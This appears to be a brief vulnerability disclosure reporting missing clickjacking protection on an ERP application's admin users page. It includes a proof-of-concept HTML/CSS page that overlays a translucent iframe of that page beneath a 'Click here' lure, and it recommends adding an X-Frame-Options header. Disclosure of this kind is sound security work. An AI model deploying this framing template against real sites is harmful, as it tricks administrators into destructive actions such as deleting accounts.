- Hello team, on
notrinoserp
there is no clickjacking protection implemented x-frame-options
, so an attacker can perform clickjacking attack, and in this case im able to delete user account via this vulnerability from the admin account, here is the POC:
![](https://akshayravic09yc47.github.io/proof/not-cj.png)
Exploit Script:
<style>
iframe {
position:relative;
width:1200px;
height: 650px;
opacity: 0.4;
z-index: 2;
}
div {
position:absolute;
top:183px;
left:880px;
z-index: 1;
}
</style>
<div>Click here</div>
<iframe src="http://127.0.0.1:4445/admin/users.php?"></iframe>
Patch Recommendation:
- Add
X-Frame
header to prevent clickjacking/UI Redressing attacks